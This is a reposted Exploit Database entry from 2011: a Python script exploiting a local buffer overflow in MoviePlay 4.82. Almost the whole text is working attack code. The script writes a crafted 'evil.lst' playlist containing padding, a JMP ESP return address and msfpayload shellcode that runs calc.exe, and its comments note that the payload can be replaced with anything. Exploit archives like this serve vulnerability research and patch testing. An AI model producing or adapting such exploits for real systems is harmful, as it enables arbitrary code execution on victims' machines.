MoviePlay 4.82 – ‘.lst’ Local Buffer Overflow

• Exploit Database
• 94 阅读

• 作者： sickness
  日期： 2011-02-11
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16153/

• #!/usr/bin/env python
  # MoviePlay 4.82 (.lst) Buffer Overflow
  # Author: sickness
  # Download : http://www.softpedia.com/get/Multimedia/Video/Video-Players/MoviePlay.shtml
  # Previous version exploit can be found here: http://www.exploit-db.com/exploits/4051/
  # Tested : Windows XP Professional SP3 (EN) latest updates with IE8
  # DATE : 10/02/2011
  ###################################################################
  # You might need to change the EIP address
  # The payload can be replaced with whatever you want, there is enough space.
  ###################################################################
  
  begin = "\x5b\x4d\x6f\x76\x69\x65\x50\x6c\x61\x79\x5d\x0d\x0a\x46\x69\x6c\x65\x4e\x61\x6d\x65\x30\x3d\x43\x3a\x5c"
  junk = '\x90' * 1085
  eip = '\xD7\x30\x9D\x7C'	# JMP ESP SHELL32.dll
  nops = '\x90'*16
  
  # msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -t c
  sc = ("\xbe\x41\x9e\x4e\xd0\x33\xc9\xda\xd7\xd9\x74\x24\xf4\xb1\x33"
  "\x58\x31\x70\x10\x83\xe8\xfc\x03\x31\x92\xac\x25\x4d\x42\xb9"
  "\xc6\xad\x93\xda\x4f\x48\xa2\xc8\x34\x19\x97\xdc\x3f\x4f\x14"
  "\x96\x12\x7b\xaf\xda\xba\x8c\x18\x50\x9d\xa3\x99\x54\x21\x6f"
  "\x59\xf6\xdd\x6d\x8e\xd8\xdc\xbe\xc3\x19\x18\xa2\x2c\x4b\xf1"
  "\xa9\x9f\x7c\x76\xef\x23\x7c\x58\x64\x1b\x06\xdd\xba\xe8\xbc"
  "\xdc\xea\x41\xca\x97\x12\xe9\x94\x07\x23\x3e\xc7\x74\x6a\x4b"
  "\x3c\x0e\x6d\x9d\x0c\xef\x5c\xe1\xc3\xce\x51\xec\x1a\x16\x55"
  "\x0f\x69\x6c\xa6\xb2\x6a\xb7\xd5\x68\xfe\x2a\x7d\xfa\x58\x8f"
  "\x7c\x2f\x3e\x44\x72\x84\x34\x02\x96\x1b\x98\x38\xa2\x90\x1f"
  "\xef\x23\xe2\x3b\x2b\x68\xb0\x22\x6a\xd4\x17\x5a\x6c\xb0\xc8"
  "\xfe\xe6\x52\x1c\x78\xa5\x38\xe3\x08\xd3\x05\xe3\x12\xdc\x25"
  "\x8c\x23\x57\xaa\xcb\xbb\xb2\x8f\x24\xf6\x9f\xb9\xac\x5f\x4a"
  "\xf8\xb0\x5f\xa0\x3e\xcd\xe3\x41\xbe\x2a\xfb\x23\xbb\x77\xbb"
  "\xd8\xb1\xe8\x2e\xdf\x66\x08\x7b\xbc\xe9\x9a\xe7\x6d\x8c\x1a"
  "\x8d\x71")
  
  exploit = junk + eip + nops + sc
  rest = '\x90'*(2000-len(exploit))
  end="\x2e\x6d\x70\x33\x0d\x0a\x46\x69\x6c\x65\x4e\x61\x6d\x65\x31\x3d\x0d\x0a\x4e\x75\x6d\x46\x69\x6c\x65\x73\x3d\x31\x0d\x0a"
  
  try:
  	f = open("evil.lst","w");
  	f.write(begin+exploit+rest+end)
  	f.close()
  	print "Done!"
  except:
  	print "Something went wront!"
  

  PowerShell

  Copy